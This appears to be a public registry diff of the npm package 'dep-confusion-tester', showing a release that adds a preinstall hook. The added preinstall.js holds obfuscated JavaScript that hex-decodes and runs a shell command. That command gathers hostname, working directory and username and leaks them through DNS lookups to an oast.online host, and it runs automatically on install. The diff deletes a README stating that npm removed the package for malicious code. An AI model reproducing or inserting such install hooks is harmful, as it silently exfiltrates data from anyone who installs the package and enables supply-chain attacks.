dep-confusion-tester 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of dep-confusion-tester might be problematic. Click here for more details.
- package/package.json +10 -4
- package/preinstall.js +1 -0
- package/xaa +1 -0
- package/xab +2 -0
- package/xac +1 -0
- package/xad +2 -0
- package/xae +1 -0
- package/xaf +2 -0
- package/xag +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "dep-confusion-tester",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"
|
|
5
|
-
"
|
|
6
|
-
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node preinstall.js"
|
|
7
|
+
},
|
|
8
|
+
"keywords": [],
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC",
|
|
11
|
+
"description": "test dppp"
|
|
12
|
+
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x5cbcd2=_0x5b51;function _0x3366(){const _0x2444fb=['217684rTvjyJ','15mQxEVG','from','error','hex','1981374AEtqfw','child_process','6pSOxwB','toString','exit','log','38952BnfCHR','362032vGqfVp','277898lGcLKy','0a2020613d2428686f73746e616d653b207077643b2077686f616d693b206563686f2027646570656e64656e63792d636f6e667573696f6e2d74657374787827293b20653d24286563686f2022246122207c206f64202d416e202d747831207c207472202d642027200a27293b206563686f2022246522207c20666f6c64202d77203339207c207768696c65204946533d2072656164202d72206368756e6b3b20646f206e6f6465202d652022726571756972652827646e7327292e7265736f6c76652827246368756e6b2e6374366c7063686a71387663726e656835756c676f6835313170787036667370732e6f6173742e6f6e6c696e65272c20636f6e736f6c652e6c6f6729223b20646f6e650a','15507sRpkwU','Error\x20executing\x20payload:\x20','1927576OLdhKn','830coPFRa'];_0x3366=function(){return _0x2444fb;};return _0x3366();}(function(_0xded9c7,_0x3daf35){const _0x18749d=_0x5b51,_0xba9f2a=_0xded9c7();while(!![]){try{const _0x56cd2d=parseInt(_0x18749d(0x79))/0x1+parseInt(_0x18749d(0x7f))/0x2*(-parseInt(_0x18749d(0x73))/0x3)+-parseInt(_0x18749d(0x77))/0x4*(parseInt(_0x18749d(0x80))/0x5)+parseInt(_0x18749d(0x84))/0x6+-parseInt(_0x18749d(0x7d))/0x7+-parseInt(_0x18749d(0x78))/0x8+parseInt(_0x18749d(0x7b))/0x9*(parseInt(_0x18749d(0x7e))/0xa);if(_0x56cd2d===_0x3daf35)break;else _0xba9f2a['push'](_0xba9f2a['shift']());}catch(_0x1934fe){_0xba9f2a['push'](_0xba9f2a['shift']());}}}(_0x3366,0x2cd40));function _0x5b51(_0x170c83,_0x5da03b){const _0x3366f5=_0x3366();return _0x5b51=function(_0x5b5195,_0x3f385a){_0x5b5195=_0x5b5195-0x73;let _0x3f579f=_0x3366f5[_0x5b5195];return _0x3f579f;},_0x5b51(_0x170c83,_0x5da03b);}const {exec}=require(_0x5cbcd2(0x85)),hexPayload=_0x5cbcd2(0x7a),decodedPayload=Buffer[_0x5cbcd2(0x81)](hexPayload,_0x5cbcd2(0x83))[_0x5cbcd2(0x74)]('utf-8');exec(decodedPayload,(_0x3f3637,_0x3bab3a,_0x29dca2)=>{const _0x229016=_0x5cbcd2;_0x3f3637&&(console[_0x229016(0x82)](_0x229016(0x7c)+_0x29dca2),process[_0x229016(0x75)](0x1)),console[_0x229016(0x76)](_0x3bab3a);});
|
package/xaa
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
6175746f6d617465722d6e386e0a2f72
|
package/xab
ADDED
package/xac
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
3795f636f6e662f6465702d636f6e667
|
package/xad
ADDED
package/xae
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
740a646570656e64656e63792d636f6e
|
package/xaf
ADDED
package/xag
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
e3138312e34302e32370a
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=dep-confusion-tester for more information.
|